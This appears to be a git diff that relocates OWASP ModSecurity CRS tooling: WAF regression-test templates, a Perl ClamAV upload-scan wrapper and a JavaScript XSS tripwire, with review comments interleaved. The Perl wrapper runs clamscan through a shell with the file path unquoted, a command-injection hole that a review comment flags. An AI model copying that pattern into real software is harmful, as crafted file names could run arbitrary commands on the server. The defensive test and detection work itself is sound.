Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + test: skeletonkeyword + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "XML attribute value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "XML element value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: 
skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Nested XML element value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Content-Type text/plain includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Content-Type application/json arg value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: 
"skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"skeletonkeyword\"}" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Content-Type application/json arg name includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"skeletonkeyword\": \"test\"}" + output: + log_contains: "id \"skeletonid\"" diff --git a/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/positivetest.yaml.skeleton b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/positivetest.yaml.skeleton new file mode 100644 index 000000000..83f0b2dee --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/positivetest.yaml.skeleton 
@@ -0,0 +1,393 @@ + - + test_title: skeletonid-skeletontest + desc: "Argument test includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Argument name includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + method: "POST" + version: "HTTP/1.0" + data: "skeletonkeyword=test" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Cookie test includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + Cookie: test=skeletonkeyword + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Cookie name includes keyword 
skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + Cookie: skeletonkeyword=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Request header test includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + test: skeletonkeyword + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "XML element includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "XML attribute name includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: 
skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "XML attribute value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "XML element value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Nested XML element value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: 
"skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Content-Type text/plain includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Content-Type application/json arg value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"skeletonkeyword\"}" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Content-Type application/json arg name includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + 
Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"skeletonkeyword\": \"test\"}" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Content-Type multipart/form-data json arg name includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"skeletonkeyword\": \"test\"}\n-----------------------------thisissparta--" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Content-Type multipart/form-data json arg value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"skeletonkeyword\": \"test\"}\n-----------------------------thisissparta--" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: 
skeletonid-skeletontest + desc: "Content-Type multipart/form-data XML element value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/xml\n\nskeletonkeyword\n-----------------------------thisissparta--" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Content-Type multipart/form-data XML element value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/xml\n\nskeletonkeyword\n-----------------------------thisissparta--" + output: + log_contains: "id \"skeletonid\"" 
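Review bot: The test described as "Content-Type multipart/form-data json arg value includes keyword skeletonkeyword" sends the same body as the "json arg name" test just before it, `{\"skeletonkeyword\": \"test\"}`, so the keyword never appears as a JSON value inside a multipart part. Its JSON part should carry `{\"test\": \"skeletonkeyword\"}`, as the plain application/json value test earlier in the file does. The last two multipart XML tests also share the same `desc`; as far as this view shows their `data` is identical too, so distinct descriptions (and bodies, if one was meant to cover an attribute) would make a failing generated test identifiable.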
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/utils/data/popularUAs.data b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/utils/data/popularUAs.data
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/utils/data/popularUAs.data
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/utils/data/popularUAs.data
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/utils/testSampling.py b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/utils/testSampling.py
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/utils/testSampling.py
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/utils/testSampling.py
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/utils/testUserAgents.py b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/utils/testUserAgents.py
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/utils/testUserAgents.py
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/utils/testUserAgents.py
diff --git a/src/common/core/modsecurity/files/coreruleset/util/APPROVED_TAGS b/src/common/core/modsecurity/files/coreruleset-v4/util/APPROVED_TAGS
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/APPROVED_TAGS
rename to src/common/core/modsecurity/files/coreruleset-v4/util/APPROVED_TAGS
diff --git a/src/common/core/modsecurity/files/coreruleset-v4/util/README b/src/common/core/modsecurity/files/coreruleset-v4/util/README
new file mode 100644
index 000000000..d9aa66ddd
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v4/util/README
@@ -0,0 +1,7 @@
+The util directory contains many supporting tools/scripts that may be used with
+the OWASP ModSecurity CRS files.
+
+Docker Support
+==============
+A Dockerfile can be found in the docker/ directory, along with additional
+notes in docker/README.md
diff --git a/src/common/core/modsecurity/files/coreruleset/util/av-scanning/runAV/common.c b/src/common/core/modsecurity/files/coreruleset-v4/util/av-scanning/runAV/common.c
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/av-scanning/runAV/common.c
rename to src/common/core/modsecurity/files/coreruleset-v4/util/av-scanning/runAV/common.c
diff --git a/src/common/core/modsecurity/files/coreruleset-v4/util/av-scanning/runAV/common.h b/src/common/core/modsecurity/files/coreruleset-v4/util/av-scanning/runAV/common.h
new file mode 100755
index 000000000..da4941071
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v4/util/av-scanning/runAV/common.h
@@ -0,0 +1,99 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define MAX_PARAMS 256 +#define MAX_IPS 256 +#define MAX_NAME_LENGTH 256 +#define MAX_VALUE_LENGTH 1024 +#define MAX_CMD_LENGTH 1024 +#define MAX_TOKEN_LENGTH 1024 +#define MAX_OUTPUT_LINE_LEN (1024) +#define MAX_OUTPUT_SIZE (MAX_OUTPUT_LINE_LEN*1024) +#define WHITE 1 +#define BLACK 0 +#define NONE 0 +#define DEBUG 1 + +typedef struct { + char name[MAX_NAME_LENGTH]; + char value[MAX_VALUE_LENGTH]; +} parameter_t; + +typedef struct { + char ip[16]; + time_t start; + long duration; + time_t end; + char token[MAX_TOKEN_LENGTH]; +} blocklist_t; + +EXTERN int lock_file(char *filename); +EXTERN int unlock_file(int fd); +EXTERN int print_reply(char *reply); +EXTERN int print_error(char *func1, char* func2, char* str, int err); +EXTERN int print_request(char* url,char *command,parameter_t *parameters, int num_of_parameters, int mask); +EXTERN int print_request_force(char* url,char *command,parameter_t *parameters, int num_of_parameters, int mask); +EXTERN int is_proxy_up(); +EXTERN int run_cmd(char *command, char *output, int output_size); +EXTERN int parse_cli (parameter_t *parameters, int max_parameters, int num_of_args, char *args[]); +EXTERN int parse_query_and_body(parameter_t *parameters, int max_parameters); +EXTERN int parse_query(char *query, parameter_t *parameters, int max_parameters); +EXTERN int parse_file(char *filename, parameter_t *parameters, int max_parameters); +EXTERN int copy_file(char *src_file, char *dst_file); +EXTERN int change_file(char *filename, parameter_t parameter); +EXTERN int find_param_idx(char *parameter_name, parameter_t *parameters, int max_parameters); +EXTERN int init_cgi(); +EXTERN int send_request(char *request,char *ip,char *port,char *reply,int max_reply_size); +EXTERN int find_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips); +EXTERN int remove_ip_idx(char *ip, blocklist_t 
*blocklist, int num_of_ips); + +EXTERN char modsec_rpc[1024]; +EXTERN char modsec_rpc_home[1024]; +EXTERN char modsec_rpc_log_file[1024]; +EXTERN char modsec_rpc_log_level[1024]; +EXTERN char modsec_rpc_ssl_lockfile[1024]; +EXTERN char modsec_rpc_externalnic_lockfile[1024]; +EXTERN char modsec_rpc_sensor_lockfile[1024]; +EXTERN char modsec_rpc_reverseproxy_lockfile[1024]; +EXTERN char modsec_rpc_mui_lockfile[1024]; +EXTERN char modsec_proxy[1024]; +EXTERN char modsec_proxy_home[1024]; +EXTERN char modsec_proxy_script[1024]; +EXTERN char modsec_proxy_ip[1024]; +EXTERN char modsec_proxy_port[1024]; +EXTERN char modsec_proxy_bin[1024]; +EXTERN char modsec_proxy_conf[1024]; +EXTERN char modsec_proxy_ext_nic[1024]; +EXTERN char modsec_proxy_pid[1024]; +EXTERN char modsec_proxy_whitelist[1024]; +EXTERN char modsec_proxy_blacklist[1024]; +EXTERN char modsec_proxy_network_prefix[1024]; +EXTERN char modsec_proxy_timeout[1024]; +EXTERN char modsec_proxy_exchange[1024]; +EXTERN char modsec_proxy_ext_ips[1024]; +EXTERN char modsec_rpc_password_file[1024]; +EXTERN char modsec_mui_ui_admin[1024]; +EXTERN char modsec_mui_ui_ipaddress[1024]; +EXTERN char modsec_mui_ui_port[1024]; +EXTERN char modsec_cli_home[1024]; +EXTERN char sensor_id[1024]; +EXTERN char serial[1024]; +EXTERN char version_number[1024]; +EXTERN char bridge_mode[1024]; +EXTERN char data_disk_space[1024]; +EXTERN char release_date[1024]; +EXTERN char conn_rate[1024]; +EXTERN char conn_rate_per_addr[1024]; +EXTERN char conns[1024]; +EXTERN char conns_per_addr[1024]; diff --git a/src/common/core/modsecurity/files/coreruleset-v4/util/av-scanning/runAV/comp b/src/common/core/modsecurity/files/coreruleset-v4/util/av-scanning/runAV/comp new file mode 100755 index 000000000..aeee5db5e --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v4/util/av-scanning/runAV/comp @@ -0,0 +1,2 @@ +gcc -c -o common.o -DEXTERN= common.c +gcc -o runAV -DEXTERN=extern common.o runAV.c 
diff --git a/src/common/core/modsecurity/files/coreruleset/util/av-scanning/runAV/runAV-clamd.c b/src/common/core/modsecurity/files/coreruleset-v4/util/av-scanning/runAV/runAV-clamd.c
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/av-scanning/runAV/runAV-clamd.c
rename to src/common/core/modsecurity/files/coreruleset-v4/util/av-scanning/runAV/runAV-clamd.c
diff --git a/src/common/core/modsecurity/files/coreruleset/util/av-scanning/runAV/runAV.c b/src/common/core/modsecurity/files/coreruleset-v4/util/av-scanning/runAV/runAV.c
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/av-scanning/runAV/runAV.c
rename to src/common/core/modsecurity/files/coreruleset-v4/util/av-scanning/runAV/runAV.c
diff --git a/src/common/core/modsecurity/files/coreruleset-v4/util/av-scanning/runav.pl b/src/common/core/modsecurity/files/coreruleset-v4/util/av-scanning/runav.pl
new file mode 100755
index 000000000..c05fbf2ae
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v4/util/av-scanning/runav.pl
@@ -0,0 +1,40 @@
+#!/usr/bin/perl
+#
+# runav.pl
+# Copyright (c) 2004-2011 Trustwave
+#
+# This script is an interface between ModSecurity and its
+# ability to intercept files being uploaded through the
+# web server, and ClamAV
+
+
+$CLAMSCAN = "clamscan";
+
+if ($#ARGV != 0) {
+ print "Usage: modsec-clamscan.pl \n";
+ exit;
+}
+
+my ($FILE) = shift @ARGV;
+
+$cmd = "$CLAMSCAN --stdout --disable-summary $FILE";
+$input = `$cmd`;
+$input =~ m/^(.+)/;
+$error_message = $1;
+
+$output = "0 Unable to parse clamscan output [$1]";
+
+if ($error_message =~ m/: Empty file\.?$/) {
+ $output = "1 empty file";
+}
+elsif ($error_message =~ m/: (.+) ERROR$/) {
+ $output = "0 clamscan: $1";
+}
+elsif ($error_message =~ m/: (.+) FOUND$/) {
+ $output = "0 clamscan: $1";
+}
+elsif ($error_message =~ m/: OK$/) {
+ $output = "1 clamscan: OK";
+}
+
+print "$output\n";
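Review bot: In runav.pl the file path is interpolated into `$cmd` and executed with backticks, so a shell parses the path before clamscan receives it, and whitespace or shell metacharacters in the name would change the command that runs. The caller presumably passes a temporary file name it generated itself, but the script should not depend on that; a list-form pipe open bypasses the shell: `open(my $fh, '-|', $CLAMSCAN, '--stdout', '--disable-summary', $FILE); $input = <$fh>;` (only the first output line is used by the `^(.+)` capture anyway). The default `0 Unable to parse clamscan output` and the `ERROR` branch both answer `0`, which keeps the check fail-closed, and that property should be preserved when the invocation is changed.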
diff --git a/src/common/core/modsecurity/files/coreruleset-v4/util/browser-tools/js-overrides.js b/src/common/core/modsecurity/files/coreruleset-v4/util/browser-tools/js-overrides.js
new file mode 100644
index 000000000..34d501779
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v4/util/browser-tools/js-overrides.js
@@ -0,0 +1,78 @@ +(function() { // don't leak XSSTripwire into global ns + + /* + Assumptions: + - we need to run first, before any other attacker script + - we can't prevent tripwire from being detected (e.g. by side effects) + Todo: + - a lot more in lockdown + - protect XHR + */ + var XSSTripwire = new Object(); + + XSSTripwire.report = function() { + // Notify server + var notify = XSSTripwire.newXHR(); + + // Create a results string to send back + var results; + try { + results = "HTML=" + encodeURIComponent(document.body.outerHTML); + } catch (e) {} // we don't always have document.body + + notify.open("POST", XSSTripwire.ReportURL, true); + notify.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); + notify.send(results); + } + + XSSTripwire.lockdown = function(obj, name) { + if (Object.defineProperty) { + Object.defineProperty(obj, name, { + configurable: false + }) + } + } + + XSSTripwire.newXHR = function() { + var xmlreq = false; + if (window.XMLHttpRequest) { + xmlreq = new XMLHttpRequest(); + } else if (window.ActiveXObject) { + // Try ActiveX + try { + xmlreq = new ActiveXObject("Msxml2.XMLHTTP"); + } catch (e1) { + // first method failed + try { + xmlreq = new ActiveXObject("Microsoft.XMLHTTP"); + } catch (e2) { + // both methods failed + } + } + } + return xmlreq; + }; + + XSSTripwire.proxy = function(obj, name, report_function_name, exec_original) { + var proxy = obj[name]; + obj[name] = function() { + // URL of the page to notify, in the event of a detected XSS event: + XSSTripwire.ReportURL = "xss-tripwire-report?function=" + encodeURIComponent(report_function_name); + + XSSTripwire.report(); + + if (exec_original) { + return proxy.apply(this, arguments); + } + }; + XSSTripwire.lockdown(obj, name); + }; + + XSSTripwire.proxy(window, 'alert', 'window.alert', true); + XSSTripwire.proxy(window, 'confirm', 'window.confirm', true); + XSSTripwire.proxy(window, 'prompt', 'window.prompt', true); + XSSTripwire.proxy(window, 'unescape', 
'unescape', true); + XSSTripwire.proxy(document, 'write', 'document.write', true); + XSSTripwire.proxy(String, 'fromCharCode', 'String.fromCharCode', true); + +})(); diff --git a/src/common/core/modsecurity/files/coreruleset/util/change-version/README.md b/src/common/core/modsecurity/files/coreruleset-v4/util/change-version/README.md similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/change-version/README.md rename to src/common/core/modsecurity/files/coreruleset-v4/util/change-version/README.md diff --git a/src/common/core/modsecurity/files/coreruleset/util/change-version/README.txt b/src/common/core/modsecurity/files/coreruleset-v4/util/change-version/README.txt similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/change-version/README.txt rename to src/common/core/modsecurity/files/coreruleset-v4/util/change-version/README.txt diff --git a/src/common/core/modsecurity/files/coreruleset/util/change-version/change-version.py b/src/common/core/modsecurity/files/coreruleset-v4/util/change-version/change-version.py similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/change-version/change-version.py rename to src/common/core/modsecurity/files/coreruleset-v4/util/change-version/change-version.py diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/CHANGES b/src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/CHANGES similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/CHANGES rename to src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/CHANGES 
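Review bot: In js-overrides.js, `XSSTripwire.lockdown` passes only `configurable: false` to `Object.defineProperty`, which leaves `writable` unchanged, so a script that runs later can still assign over the proxied `window.alert`, `document.write` and the other hooks and silence the tripwire; `{ configurable: false, writable: false }` would pin the wrapper. `XSSTripwire.report` also calls `notify.open` without checking that `newXHR` returned an object, so where no XHR implementation is available the wrapper throws before `proxy.apply` runs and the original function never executes; an `if (!notify) return;` guard at the top of `report` keeps the page working. The report body is the whole `document.body.outerHTML`, so whatever receives `xss-tripwire-report` should treat it as sensitive page content when it is logged or stored.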
diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/README.md b/src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/README.md
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/README.md
rename to src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/README.md
diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/TODO.txt b/src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/TODO.txt
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/TODO.txt
rename to src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/TODO.txt
diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test1.conf b/src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test1.conf
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test1.conf
rename to src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test1.conf
diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test2.conf b/src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test2.conf
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test2.conf
rename to src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test2.conf
diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test3.conf b/src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test3.conf
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test3.conf
